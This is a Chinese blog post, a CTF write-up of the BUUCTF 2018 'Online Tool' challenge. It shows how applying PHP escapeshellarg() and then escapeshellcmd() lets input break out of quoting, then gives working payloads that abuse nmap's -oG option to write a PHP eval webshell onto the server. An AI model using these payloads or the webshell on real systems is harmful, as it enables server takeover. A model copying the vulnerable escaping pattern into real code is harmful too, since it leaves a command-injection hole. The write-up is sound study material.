BUUCTF 2018 Online Tool(escapeshellarg和escapeshellcmd使用不当导致rce)

最新推荐文章于 2022-08-04 16:36:17 发布
最新推荐文章于 2022-08-04 16:36:17 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: CTF-Web 文章标签: 安全 ctf web安全 web web development
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45521281/article/details/106236200
版权

参考:
谈谈escapeshellarg参数绕过和注入的问题
PHP escapeshellarg()和escapeshellcmd()并用之殇
谈escapeshellarg绕过与参数注入漏洞
https://blog.csdn.net/qq_26406447/article/details/100711933

进入题目显示php源码:
在这里插入图片描述
这里用到escapeshellarg()、escapeshellcmd()两个函数:
escapeshellarg:
escapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 命令执行函数,并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。如举例:

<?php
$a="172.17.0.2' -v -d a=1";
$b=escapeshellarg($a);
echo $a."<br/>".$b."<br/>";
?>

输出

172.17.0.2' -v -d a=1
'172.17.0.2'\'' -v -d a=1'

经过escapeshellargs()处理后成为 '172.17.0.2'\' ' -v -d a=1'' 即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

escapeshellcmd:
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。

反斜线(\)会在以下字符之前插入:

&#;`|*?~<>^()[]{}$ \, \x0A(换行) 和 \xFF

’ 和 " 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。具体作用举个例子吧:
在这里插入图片描述
那么 escapeshellcmd 和 escapeshellarg 一起使用的时候会发生什么问题呢,我们继续看看,这两个函数都会对单引号进行处理,但还是有区别的,区别如下:
在这里插入图片描述
对于单个单引号, escapeshellarg 函数转义后,还会在左右各加一个单引号,但 escapeshellcmd 函数是直接加一个转义符,对于成对的单引号,escapeshellcmd 函数默认不转义,但 escapeshellarg 函数转义。
escapeshellcmd() 和 escapeshellarg() 一起出现会有什么问题呢,我们举个简单例子如下:
在这里插入图片描述
详细分析一下这个过程:

  1. 传入的参数是
127.0.0.1' -v -d a=1
  1. 由于escapeshellarg先对单引号转义,escapeshellarg 函数转义后,还会在左右各加一个单引号,再用单引号将左右两部分括起来从而起到连接的作用。所以处理之后的效果如下:
'127.0.0.1'\'' -v -d a=1'
  1. 经过escapeshellcmd针对第二步处理之后的参数中的\以及a=1’中的单引号进行处理转义之后的效果如下所示:
'127.0.0.1'\\'' -v -d a=1\'

这里由于中间的\被解释为\而不再是转义字符,所以后面的'没有被转义,与再与其后面紧接的'配对儿成了一个空白连接符,所以把最后面的一个'给孤立了出来,而’ 和 " 在不配对儿的时候被escapeshellcmd转义,所以加上了 \ 。

  1. 由于第三步处理之后的payload中的\被解释成了\而不再是转义字符,所以单引号配对连接之后将payload分割为三个部分,具体如下所示:
    在这里插入图片描述
    所以这个payload可以简化为curl 127.0.0.1\ -v -d a=1’,即向127.0.0.1\发起请求,POST 数据为a=1’。

但是如果是先用 escapeshellcmd 函数过滤,再用的 escapeshellarg 函数过滤,则没有这个问题。

现在接着看这道题:

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

这有个system来执行命令,而且有传参,肯定是利用这里了

这里代码的本意是希望我们输入ip这样的参数做一个扫描,通过上面的两个函数来进行规则过滤转译,我们的输入会被单引号引起来,但是因为我们看到了上面的漏洞所以我们可以逃脱这个引号的束缚

这里常见的命令后注入操作如 | & && ; 都不行,虽然我们通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转移…

这时候就只有想想能不能利用nmap来做些什么了。这时候搜索可以发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件。 这个命令就是我们的输入可控!然后写入到文件!OK很自然的想到了上传一个一句话木马了。
那么如何构造呢?我们可以用一下代码来进行试验来寻找:
实验一:

?host=<?php @eval($_POST["hack"]);?> -oG hack.php

<?php
$host = "<?php @eval($_POST["hack"]);?> -oG hack.php";
$host = escapeshellarg($host);
$host2 = escapeshellcmd($host);
echo $host."\n".$host2;
?>

输出

'<?php @eval($_POST["hack"]);?> -oG hack.php'
'\<\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG hack.php'

即:

nmap -T5 -sT -Pn --host-timeout 2 -F '\<\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG hack.php' -oG hack.php

在本地实验可知,这样不可以:
在这里插入图片描述
在这里插入图片描述
实验二:

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php

<?php
$host = "' <?php @eval($_POST["hack"]);?> -oG hack.php";
$host = escapeshellarg($host);
$host2 = escapeshellcmd($host);
echo $host."\n".$host2;
?>

输出

''\'' <?php @eval($_POST["hack"]);?> -oG hack.php'
''\\'' \<\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG hack.php\'

返回结果是生成的文件名后面会多一个引号。

实验三:最后面加引号但引号前没有空格

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php'

<?php
$host = "' <?php @eval($_POST["hack"]);?> -oG hack.php'";
$host = escapeshellarg($host);
$host2 = escapeshellcmd($host);
echo $host."\n".$host2;
?>

输出

''\'' <?php @eval($_POST["hack"]);?> -oG hack.php'\'''
''\\'' \<\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG hack.php'\\'''

文件名后面就会多出\

实验四:

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

<?php
$host = "' <?php @eval($_POST["hack"]);?> -oG hack.php '";
$host = escapeshellarg($host);
$host2 = escapeshellcmd($host);
echo $host."\n".$host2;
?>

输出

''\'' <?php @eval($_POST["hack"]);?> -oG hack.php '\'''
''\\'' \<\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG hack.php '\\'''

即:

nmap -T5 -sT -Pn --host-timeout 2 -F \ \<\?php @eval\(\$_POST\["hack"\]\)\;\?\> -oG hack.php -oG hack.php

执行后会返回文件夹名
在这里插入图片描述
hack.php:
在这里插入图片描述
在这里插入图片描述
然后蚁剑连接,找到flag
在这里插入图片描述
在这里插入图片描述

zhang三
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Online-Compile
01-30
Online_Compile
PHP escapeshellarg()+escapeshellcmd()绕过
最新发布
rev1ve的博客
12-08 630
这样的流程来处理输入是存在隐患的,mail就是个很好的例子,因为它函数内部使用了escapeshellcmd,如果开发人员仅用escapeshellarg来处理输入再传给mail那这层防御几乎是可以忽略的。如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail和 Naigos Core 中的 curl都是很好的参数注入的例子。当进行escapeshellarg()函数处理后,会先进行字符转义,变成如下。那么我们在传入参数的前面添加单引号,后面空格加单引号。
php使用escapeshellarg时中文被过滤的解决方法
10-21
主要介绍了php使用escapeshellarg时中文被过滤的解决方法,测试后发现问题的原因是shell和apache php-cgi的运行环境不同引起的,需要的朋友可以参考下
online_classroom.csv
03-17
CSDN因果分析系列相关数据
青岛大学开源 Online Judge
11-03
青岛大学开源 Online Judge | QQ群 496710125 。。。。。
PHP代码审计10—命令执行漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-04 1584
php命令执行基础与CTF例题分析
buu webOnline Toolnmap文件写入)
m0_55378150的博客
04-05 537
打开靶场,好家伙,上来就是代码,我喜欢 老规矩,找核心代码 echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 这里调用了system函数使用了nmap命令,只有host参数是可控的,并且它是以get方式传入的,我们先测试一下本地ip:?host=127.0.0.1 正常回显,我们往回看看怎么利用 if(!isset($_GET['host'])) { highlight_file(__FILE__); } e
BUUCTF 2018 Online Tool
qq_50613938的博客
10-25 118
//首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用的这里没什么用 ```handlebars if(!isset( $_GET['host'])) {//这里传进来了一个参数 highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); /*一眼就能看出来这里的 $host = escapeshellcmd($host);.
CTF Web复现』[BUUCTF 2018]Online Tool
Ho1aAs‘s Blog
10-24 3787
@[toc] # 利用点 - nmap写文件 - escapeshellarg() + escapeshellcmd()使用不当 # Payload ``` [GET]http://URL/?host='<?php eval($_POST[a]);?> -oG 1.php ' ```
escapeshellargescapeshellcmd 绕过之[BUUCTF 2018]Online Tool
qq_58970968的博客
07-09 894
知识点:escapeshellargescapeshellcmd 绕过nmap -oG 参数,将结果和命令写入到文件详细:参考谈谈escapeshellarg参数绕过和注入的问题escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)我的理解
sqlTool.rar_Online SQL Tool_SQLTool_sqlto
09-24
一个在线的演示SQL语句应用的工具网络应用...
node-php-escape-shell:基于php shell元字符的转义函数
06-04
安装 ...描述 逃生者 php_escapeshellarg() 在字符串周围... escapeshellarg() 为 php 原始的 escapeshellarg 函数添加了更多选项,isWindows - 添加以允许在 windows 操作系统中转义 linux 风格的参数,反之亦然。 escap
php参数过滤、数据过滤类
05-01
3)在使用系统函数时,必须使用escapeshellarg(),escapeshellcmd()参数去过滤,这样你也就可以放心的使用系统函数。 4)对于跨站,strip_tags(),htmlspecialchars()两个参数都不错,对于用户提交的的带有html和php的...
php参数过滤、数据过滤类.zip
07-11
3)在使用系统函数时,必须使用escapeshellarg(),escapeshellcmd()参数去过滤,这样你也就可以放心的使用系统函数。 4)对于跨站,strip_tags(),htmlspecialchars()两个参数都不错,对于用户提交的的带有...
[极客大挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)
热门推荐
qq_45521281的博客
04-15 1万+
进去之后: 发现登录框,可能是万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 点击登录 跳转到了check.php页面。并得到了用户名和密码: 尝试密码md5解密失败,还是回到注入的思路上,查询字段数: 在url中输入: /check.php?username=admin' order by 3%23&password=1 ...
[极客大挑战 2019]RCE ME(取反、异或绕过正则表达式、bypass disable_function)
qq_45521281的博客
04-21 1万+
题目进去后,很简单的代码,显然命令执行: 但是得要先绕过preg_match()中正则表达式的限制,一开始傻乎乎的直接传了个数组,妄图绕过preg_match(),这很显然是不行的。 附上大佬的文章:关于PHP正则的一些绕过方法 ...
JWT及JWT伪造
qq_45521281的博客
05-12 1万+
文章目录JWT简介传统的Session认证基于token的鉴权机制JWT的构成头部(header)载荷(payload)签证(signature)通过JWT 进行认证JWT token破解绕过JWT伪造Bukgu jwt——JWT伪造 JWT简介 Json web token (JWT),是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被
PHP的模板注入(Smarty模板)
qq_45521281的博客
07-24 9116
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多文章往往只是一笔带过,讲解的重心往往在flask等框架上。本篇文章结合一道CTF题目对Smarty的SSTI漏洞进行了一定的分析。题目地址:https://buuoj.cn/challenges CISCN2019华东南赛区Web11 基本信息 题目模拟了一个获取IP的API,并且可以在最下方看到“Build With Smarty !”可以确定页面使用的是Smarty模板引擎。 题
PHP序列化反序列化漏洞总结(一篇懂)
qq_45521281的博客
05-03 7465
文章目录序列化和反序列化的概念与基础知识PHP的序列化访问控制修饰符PHP的反序列化PHP反序列化漏洞(常规)__wakeup()__destruct()示例一:示例二(连菜刀、反序列化免杀后门):__toString()Error类ExceptionPHP中Session反序列化(重点)简介与基础知识Session序列化漏洞利用PHP Session中的序列化危害实际利用CTF例题 序列化和反...
line tool C++
05-24
Line tool in C++ can be implemented using the Bresenham's line algorithm. Here's an example implementation: ```c++ #include <iostream> #include <cmath> using namespace std; void drawLine(int x1, int y1, int x2, int y2) { int dx = abs(x2 - x1); int dy = abs(y2 - y1); int sx = x1 < x2 ? 1 : -1; int sy = y1 < y2 ? 1 : -1; int err = dx - dy; while (x1 != x2 || y1 != y2) { cout << "(" << x1 << ", " << y1 << ")" << endl; int e2 = err * 2; if (e2 > -dy) { err -= dy; x1 += sx; } if (e2 < dx) { err += dx; y1 += sy; } } cout << "(" << x2 << ", " << y2 << ")" << endl; } int main() { drawLine(1, 1, 8, 5); return 0; } ``` This implementation takes the coordinates of two points (`x1`, `y1`) and (`x2`, `y2`) and draws a line between them using the Bresenham's algorithm. The algorithm calculates the slope and direction of the line and then iteratively calculates the coordinates of the points that lie on the line. The `drawLine` function prints the coordinates of each point on the line to the console.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值